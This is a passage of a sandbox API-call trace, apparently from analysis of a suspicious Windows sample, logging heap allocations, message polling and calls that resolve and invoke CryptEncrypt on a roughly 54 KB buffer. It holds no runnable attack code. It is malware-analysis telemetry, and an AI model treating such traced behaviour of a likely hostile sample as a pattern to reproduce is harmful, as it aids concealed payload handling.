(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0237.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0237.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0237.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0237.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0237.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0237.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0237.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0237.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0237.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0237.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e512e0 [0237.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0237.859] CryptEncrypt (in: hKey=0xa87090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xd667, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xd668) returned 1 [0237.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0237.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0237.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0237.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0237.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0237.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0237.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0237.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0237.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0237.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0237.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0237.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0237.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0237.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0237.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0237.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0237.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0237.862] CharLowerBuffW (in: lpsz="byte[54888]", cchLength=0xb | out: lpsz="byte[54888]") returned 0xb [0237.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0237.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0237.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0237.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.942] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0237.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0237.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0237.944] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0237.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0237.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.945] CryptEncrypt (in: hKey=0xa87090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3cb68*, pdwDataLen=0x8cef60*=0xd667, dwBufLen=0xd668 | out: pbData=0x2f3cb68*, pdwDataLen=0x8cef60*=0xd668) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0237.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0237.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0237.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0237.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0237.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0237.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0237.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0237.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0237.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0237.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0237.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0237.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0237.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0237.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0237.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0237.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0237.956] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0237.956] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.956] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0237.956] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0237.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0237.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.957] 